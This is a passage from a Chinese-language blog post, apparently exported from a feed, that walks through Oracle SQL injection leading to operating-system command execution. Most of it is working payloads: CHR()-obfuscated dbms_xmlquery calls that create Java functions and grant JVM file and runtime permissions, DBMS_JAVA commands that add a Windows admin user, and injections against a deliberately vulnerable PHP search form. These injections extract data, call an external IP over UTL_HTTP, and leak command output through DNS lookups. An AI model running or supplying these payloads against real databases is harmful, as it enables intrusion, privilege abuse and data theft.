dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(109)||CHR(121)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(49)||CHR(32)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(110)||CHR(117)||CHR(109)||CHR(98)||CHR(101)||CHR(114)||CHR(32)||CHR(105)||CHR(115)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(68)||CHR(69)||CHR(67)||CHR(76)||CHR(65)||CHR(82)||CHR(69)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(32)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(84)||CHR(69)||CHR(77)||CHR(80)||CHR(95)||CHR(74)||CHR(65)||CHR(86)||CHR(65)||CHR(95)||CHR(80)||CHR(79)||CHR(76)||CHR(73)||CHR(67)||CHR(89)||CHR(59)||CHR(67)||CHR(85)||CHR(82)||CHR(83)||CHR(79)||CHR(82)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(73)||CHR(83)||CHR(32)||CHR(83)||CHR(69)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(71)||CHR(82)||CHR(65)||CHR(78)||CHR(84)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(40)||CHR(41)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(83)||CHR(89)||CHR(83)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(80)||CHR(101)||CHR(114)||CHR(109)||CHR(105)||CHR(115)||CHR(115)||CHR(105)||CHR(111)||CHR(110)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(119)||CHR(114)||CHR(105)||CHR(116)||CHR(101)||CHR(70)||CHR(105)||CHR(108)||CHR(101)||CHR(68)||CHR(101)||CHR(115)||CHR(99)||CHR(114)||CHR(105)||CHR(112)||CHR(116)||CHR(111)||CHR(114)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(42)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(69)||CHR(78)||CHR(65)||CHR(66)||CHR(76)||CHR(69)||CHR(68)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(32)||CHR(102)||CHR(114)||CHR(111)||CHR(109)||CHR(32)||CHR(100)||CHR(117)||CHR(97)||CHR(108)||CHR(59)||CHR(66)||CHR(69)||CHR(71)||CHR(73)||CHR(78)||CHR(32)||CHR(79)||CHR(80)||CHR(69)||CHR(78)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(32)||CHR(70)||CHR(69)||CHR(84)||CHR(67)||CHR(72)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(66)||CHR(85)||CHR(76)||CHR(75)||CHR(32)||CHR(67)||CHR(79)||CHR(76)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(73)||CHR(78)||CHR(84)||CHR(79)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(59)||CHR(67)||CHR(76)||CHR(79)||CHR(83)||CHR(69)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(73)||CHR(77)||CHR(80)||CHR(79)||CHR(82)||CHR(84)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(40)||CHR(80)||CHR(79)||CHR(76)||CHR(41)||CHR(59)||CHR(69)||CHR(78)||CHR(68)||CHR(59)||CHR(39)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(49)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) is not null--\n' and 1=myjava1()--\n' and dbms_xmlquery.newcontext(CHR(100)||CHR(101)||CHR(99)||CHR(108)||CHR(97)||CHR(114)||CHR(101)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(99)||CHR(114)||CHR(101)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(111)||CHR(114)||CHR(32)||CHR(114)||CHR(101)||CHR(112)||CHR(108)||CHR(97)||CHR(99)||CHR(101)||CHR(32)||CHR(102)||CHR(117)||CHR(110)||CHR(99)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(32)||CHR(109)||CHR(121)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(50)||CHR(32)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(110)||CHR(117)||CHR(109)||CHR(98)||CHR(101)||CHR(114)||CHR(32)||CHR(105)||CHR(115)||CHR(32)||CHR(80)||CHR(82)||CHR(65)||CHR(71)||CHR(77)||CHR(65)||CHR(32)||CHR(65)||CHR(85)||CHR(84)||CHR(79)||CHR(78)||CHR(79)||CHR(77)||CHR(79)||CHR(85)||CHR(83)||CHR(95)||CHR(84)||CHR(82)||CHR(65)||CHR(78)||CHR(83)||CHR(65)||CHR(67)||CHR(84)||CHR(73)||CHR(79)||CHR(78)||CHR(59)||CHR(32)||CHR(98)||CHR(101)||CHR(103)||CHR(105)||CHR(110)||CHR(32)||CHR(101)||CHR(120)||CHR(101)||CHR(99)||CHR(117)||CHR(116)||CHR(101)||CHR(32)||CHR(105)||CHR(109)||CHR(109)||CHR(101)||CHR(100)||CHR(105)||CHR(97)||CHR(116)||CHR(101)||CHR(32)||CHR(39)||CHR(39)||CHR(68)||CHR(69)||CHR(67)||CHR(76)||CHR(65)||CHR(82)||CHR(69)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(32)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(84)||CHR(69)||CHR(77)||CHR(80)||CHR(95)||CHR(74)||CHR(65)||CHR(86)||CHR(65)||CHR(95)||CHR(80)||CHR(79)||CHR(76)||CHR(73)||CHR(67)||CHR(89)||CHR(59)||CHR(67)||CHR(85)||CHR(82)||CHR(83)||CHR(79)||CHR(82)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(73)||CHR(83)||CHR(32)||CHR(83)||CHR(69)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(71)||CHR(82)||CHR(65)||CHR(78)||CHR(84)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(40)||CHR(41)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(83)||CHR(89)||CHR(83)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(106)||CHR(97)||CHR(118)||CHR(97)||CHR(46)||CHR(108)||CHR(97)||CHR(110)||CHR(103)||CHR(46)||CHR(82)||CHR(117)||CHR(110)||CHR(116)||CHR(105)||CHR(109)||CHR(101)||CHR(80)||CHR(101)||CHR(114)||CHR(109)||CHR(105)||CHR(115)||CHR(115)||CHR(105)||CHR(111)||CHR(110)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(32)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(114)||CHR(101)||CHR(97)||CHR(100)||CHR(70)||CHR(105)||CHR(108)||CHR(101)||CHR(68)||CHR(101)||CHR(115)||CHR(99)||CHR(114)||CHR(105)||CHR(112)||CHR(116)||CHR(111)||CHR(114)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(42)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(44)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(69)||CHR(78)||CHR(65)||CHR(66)||CHR(76)||CHR(69)||CHR(68)||CHR(39)||CHR(39)||CHR(39)||CHR(39)||CHR(32)||CHR(102)||CHR(114)||CHR(111)||CHR(109)||CHR(32)||CHR(100)||CHR(117)||CHR(97)||CHR(108)||CHR(59)||CHR(66)||CHR(69)||CHR(71)||CHR(73)||CHR(78)||CHR(32)||CHR(79)||CHR(80)||CHR(69)||CHR(78)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(32)||CHR(70)||CHR(69)||CHR(84)||CHR(67)||CHR(72)||CHR(32)||CHR(67)||CHR(49)||CHR(32)||CHR(66)||CHR(85)||CHR(76)||CHR(75)||CHR(32)||CHR(67)||CHR(79)||CHR(76)||CHR(76)||CHR(69)||CHR(67)||CHR(84)||CHR(32)||CHR(73)||CHR(78)||CHR(84)||CHR(79)||CHR(32)||CHR(80)||CHR(79)||CHR(76)||CHR(59)||CHR(67)||CHR(76)||CHR(79)||CHR(83)||CHR(69)||CHR(32)||CHR(67)||CHR(49)||CHR(59)||CHR(68)||CHR(66)||CHR(77)||CHR(83)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(69)||CHR(88)||CHR(80)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(46)||CHR(73)||CHR(77)||CHR(80)||CHR(79)||CHR(82)||CHR(84)||CHR(95)||CHR(74)||CHR(86)||CHR(77)||CHR(95)||CHR(80)||CHR(69)||CHR(82)||CHR(77)||CHR(83)||CHR(40)||CHR(80)||CHR(79)||CHR(76)||CHR(41)||CHR(59)||CHR(69)||CHR(78)||CHR(68)||CHR(59)||CHR(39)||CHR(39)||CHR(59)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(114)||CHR(101)||CHR(116)||CHR(117)||CHR(114)||CHR(110)||CHR(32)||CHR(49)||CHR(59)||CHR(101)||CHR(110)||CHR(100)||CHR(59)||CHR(39)||CHR(59)||CHR(32)||CHR(99)||CHR(111)||CHR(109)||CHR(109)||CHR(105)||CHR(116)||CHR(59)||CHR(32)||CHR(101)||CHR(110)||CHR(100)||CHR(59)) is not null--\n' and 1=myjava2()--\n' and 1=2 union select 1,(select javacmd('whoami') from dual),3 from dual--\n\n\u5982\u679c\u6709\u4e86java.io.permisson(or javasyspriv)\u6743\u9650\u7684\u8bdd\u4e5f\u53ef\u4ee5\u8c03\u7528\u4e0b\u9762\u6709\u6f0f\u6d1e\u7684\u5305\u76f4\u63a5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\nDBMS_JAVA.RUNJAVA() 11g R1 and R2\nSELECT DBMS_JAVA.RUNJAVA('oracle\/aurora\/util\/Wrapper c:\\\\windows\\\\system32\\\\cmd.exe \/c net user admin password \/add') FROM DUAL;\nDBMS_JAVA_TEST.FUNCALL()  10g R2, 11g R1 and R2\nSelect DBMS_JAVA_TEST.FUNCALL('oracle\/aurora\/util\/Wrapper','main','\/bin\/bash','-c','pwd &gt; \/tmp\/pwd.txt') from dual;\nSelect DBMS_JAVA_TEST.FUNCALL('oracle\/aurora\/util\/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','\/c','dir &gt; c:\\\\pwd.txt') from dual; #windows ORA-29540: class oracle\/aurora\/util\/Wrapper does not exist\n<\/code><\/pre><\/div><\/div>\n\n<h3 id=\"0x3-\u5b9e\u6218\">0x3 \u5b9e\u6218<\/h3>\n<p>\u8fd9\u91cc\u5229\u7528\u4e0a\u9762\u7684\u4e00\u4e2a\u603b\u7ed3\uff0c\u8fdb\u884c\u4e00\u4e2a\u5b9e\u6218\u3002<\/p>\n\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>\u6570\u636e\u5e93\u8868\u5982\u4e0b\uff1a\ncreate table users(id int,name varchar(255),age int);\nINSERT INTO users VALUES ('1', 'test', '22');\nINSERT INTO users VALUES ('2', 'admin', '33');\nINSERT INTO users VALUES ('3', 'aaaa', '44');\ncommit;\n\u670d\u52a1\u7aef\u4ee3\u7801\u5982\u4e0b\uff1a\n&lt;?php\nfunction query($name) {\n    $db = \"(DESCRIPTION=(ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.44.157)(PORT = 1521)))(CONNECT_DATA=(SID=orcl)))\"; \n    $conn = oci_connect('TEST', 'test123456789', $db);\n    if (! $conn) {\n        die('Cannot connect to the database: '. oci_error());\n    }\n    $stat = oci_parse($conn, \"SELECT id,name,age FROM TEST.users WHERE name LIKE '%\". $name .\"%'\");\n    echo \"SELECT id,name,age FROM TEST.users WHERE name LIKE '%\". $name .\"%'\";\n    oci_execute($stat);\n    if ($stat) {\n        echo '&lt;table&gt;';\n        echo '&lt;tr&gt;&lt;th&gt;ID&lt;\/th&gt;&lt;th&gt;Name&lt;\/th&gt;&lt;th&gt;Age&lt;\/th&gt;&lt;\/tr&gt;';\n        while (($row = oci_fetch_array($stat, OCI_BOTH)) != false) {\n            echo '&lt;tr&gt;';\n            echo '&lt;td&gt;'. $row['ID'] .'&lt;\/td&gt;';\n            echo '&lt;td&gt;'. htmlspecialchars($row['NAME']) .'&lt;\/td&gt;';\n            echo '&lt;td&gt;'. $row['AGE'] .'&lt;\/td&gt;';\n            echo '&lt;\/tr&gt;';\n        }\n        echo '&lt;\/table&gt;';\n    }\n    oci_free_statement($stat);\n    oci_close($conn);\n}\n\nif (isset($_POST['name']) &amp;&amp; !empty($_POST['name'])) {\n    query($_POST['name']);\n}\n\n?&gt;\n\n&lt;form method=\"POST\"&gt;\n&lt;input type=\"text\" name=\"name\" length=\"15\"&gt;&lt;input type=\"submit\" value=\"Search\"&gt;\n&lt;\/form&gt;\n<\/code><\/pre><\/div><\/div>\n<p>\u641c\u7d22\u6846\u6ce8\u5165 \u641c\u7d22a \u53ef\u4ee5\u770b\u5230\u76f8\u5173sql\u8bed\u53e5 \n <img src=\"\/images\/posts\/hackingoracle\/WX20180619-171718@2x.png\" alt=\"image\" \/><\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1 = ctxsys.drithsx.sn(1,(select user from dual))--\n \u67e5\u5f53\u524d\u7528\u6237 TEST\n<\/code><\/pre><\/div><\/div>\n<p><img src=\"\/images\/posts\/hackingoracle\/2.png\" alt=\"image\" \/><\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1 = ctxsys.drithsx.sn(1,(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))--\n \u67e5\u770b\u7248\u672c Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 \n<\/code><\/pre><\/div><\/div>\n<p><img src=\"\/images\/posts\/hackingoracle\/3.png\" alt=\"image\" \/><\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and UTL_HTTP.REQUEST('http:\/\/74.121.151.89:53')='1'--\u5224\u65ad\u80fd\u5426\u51fa\u7f51 \u80fd\u51fa\u7f51\n<\/code><\/pre><\/div><\/div>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code> ' and 1 = ctxsys.drithsx.sn(1,(select wmsys.wm_concat(granted_role) from user_role_privs))--\n\u67e5\u5f53\u524d\u7528\u6237\u6743\u9650 CONNECT,RESOURCE\n<\/code><\/pre><\/div><\/div>\n<p><img src=\"\/images\/posts\/hackingoracle\/4.png\" alt=\"image\" \/> \n\u63d0\u6743\u5230dba\u7686\u5931\u8d25<br \/>\n11.1.0.7.0\u4ee5\u4e0b\u53ef\u4ee5\u7528dbms_xmlquery.newcontext\u6765\u6267\u884cpl\/sql\u6765\u6267\u884c\u547d\u4ee4(\u547d\u4ee4\u5728\u4e0a\u9762)\n  <img src=\"\/images\/posts\/hackingoracle\/5.png\" alt=\"image\" \/> \n\u4f9d\u6b21\u6267\u884c\u4e0a\u9762sql\u8bed\u53e5\u540e \u53ef\u4ee5\u5728navicat\u4e2d\u67e5\u770b\n\u6267\u884cselect * from user_objects\u53ef\u4ee5\u67e5\u770b\u76f8\u5173\u51fd\u6570\u662f\u5426\u521b\u5efa\u6210\u529f\n<img src=\"\/images\/posts\/hackingoracle\/6.png\" alt=\"image\" \/> \n\u6267\u884cselect * from user_java_policy \u67e5\u770b\u5176\u76f8\u5e94\u7684\u6743\u9650\u662f\u5426\u52a0\u4e0a\n<img src=\"\/images\/posts\/hackingoracle\/7.png\" alt=\"image\" \/> \n\u5728web\u4e2d \u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u7684\u8bed\u53e5\u6765\u5224\u65ad\u662f\u5426\u52a0\u4e0a<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>' and 1 = ctxsys.drithsx.sn(1,(select count(*) from user_java_policy where grantee_name='TEST'))--\n' and 1 = ctxsys.drithsx.sn(1,(select * from user_objects where OBJECT_NAME='javaexec'))--\n<\/code><\/pre><\/div><\/div>\n<p>\u6700\u540e\u6267\u884c\u547d\u4ee4 whoami\u4f1a\u62a5\u9519(\u5177\u4f53\u539f\u56e0\u4e0d\u8be6) \u4f46\u7a0b\u5e8f\u8fd8\u662f\u4f1a\u6267\u884c \u60f3\u8981\u5b9e\u65f6\u67e5\u770b\u53ef\u4ee5\u6362\u4e2a\u547d\u4ee4 \u4ee5\u4e0b\u5206\u522b\u662f\u56db\u4e2a\u622a\u56fe\u7684\u6548\u679c<\/p>\n<div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>'||utl_inaddr.get_host_name((select javacmd('whoami') from dual))||'\n'||utl_inaddr.get_host_name((select javacmd('ping 8.8.8.8') from dual))||'\n'||utl_inaddr.get_host_name((Select DBMS_JAVA_TEST.FUNCALL('oracle\/aurora\/util\/Wrapper','main','c:\\\\windows\\\\system32\\\\cmd.exe','\/c','ping 74.121.151.89') from dual))||'   #\u6ce8\u610f\u8fd9\u4e2a\u4e0d\u80fd\u56de\u663e\n'||utl_inaddr.get_host_name((select utl_raw.cast_to_varchar2(utl_encode.base64_encode(utl_raw.cast_to_raw(javacmd('ipconfig')))) from dual))||' #\u6709\u7684\u65f6\u5019\u4f7f\u7528base64\u52a0\u5bc6\u540e\u770b\u7740\u7a0d\u5fae\u8212\u670d\u4e00\u70b9\n<\/code><\/pre><\/div><\/div>\n<p>whoami\n<img src=\"\/images\/posts\/hackingoracle\/8.png\" alt=\"image\" \/> \nping 8.8.8.8\n<img src=\"\/images\/posts\/hackingoracle\/9.png\" alt=\"image\" \/> \nDBMS_JAVA_TEST.FUNCAL\n<img src=\"\/images\/posts\/hackingoracle\/10.png\" alt=\"image\" \/> \nbase64 encode\n<img src=\"\/images\/posts\/hackingoracle\/12.png\" alt=\"image\" \/> \n\u4e00\u4e9b\u9700\u8981\u6ce8\u610f\u7684\u5751\uff1a<\/p>\n<ul>\n  <li>\u6709\u7684\u8bed\u53e5\u76f4\u63a5\u653e\u5230navicat\u91cc\u9762\u662f\u53ef\u4ee5\u6267\u884c\u7684\uff0c\u4f46\u662f\u901a\u8fc7web\u6267\u884c\u4f1a\u51fa\u95ee\u9898\uff0c\u6240\u6709\u5efa\u8bae\u672c\u5730\u6d4b\u8bd5\u540e\u518d\u8f6c\u7801\u8fd0\u884c\uff0c\u4e00\u822c\u60c5\u51b5\u4e0boracle\u4e2d\u53cc\u5f15\u53f7\u4f1a\u5305\u542b\u7279\u5b9a\u5b57\u7b26\uff0c\u6240\u4ee5\u4e00\u822c\u4f1a\u770b\u5230\u4e00\u4e9b\u2019\u2019'\u2019\u6210\u5bf9\u7684\u53cc\u5f15\u53f7\uff0c\u8f6c\u7801\u65f6\u2019\u2019'\u2019\u53d8\u6210\u2019\u2019 \u2018\u2018\u53d8\u6210\u2019 \u2018\u76f4\u63a5\u53bb\u9664\u5c31\u53ef\u4ee5\u4e86\u3002 <br \/>\n\u5176\u4ed6\u53c2\u8003\u94fe\u63a5\u5982\u4e0b\uff1a\n    <div class=\"highlighter-rouge\"><div class=\"highlight\"><pre class=\"highlight\"><code>https:\/\/redn3ck.github.io\/2018\/04\/25\/Oracle%E6%B3%A8%E5%85%A5-%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-Shell%E5%8F%8D%E5%BC%B9\/\nhttps:\/\/www.t00ls.net\/articles-23608.html\nhttps:\/\/github.com\/alexei-led\/docker-oracle-xe-11g\nhttps:\/\/www.secpulse.com\/archives\/30872.html\nhttp:\/\/psoug.org\/articles\/Hacking-Aurora-in-Oracle-11g.htm\nhttp:\/\/www.red-database-security.com\/tutorial\/run_os_commands_via_webapp.html\n<\/code><\/pre><\/div>    <\/div>\n    <p>#\n\u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1a<a href=\"https:\/\/notwhy.github.io\/\">whynot<\/a> \u00bb <a href=\"https:\/\/notwhy.gitbooks.io\/\/2018\/06\/hacking-oracle\/\">hacking_ora<\/a><\/p>\n  <\/li>\n<\/ul>\n\n","pubDate":"Tue, 19 Jun 2018 00:00:00 +0000","link":"http:\/\/notwhy.github.io\/2018\/06\/hacking-oracle\/","guid":"http:\/\/notwhy.github.io\/2018\/06\/hacking-oracle\/","category":"sql-injection"}]}}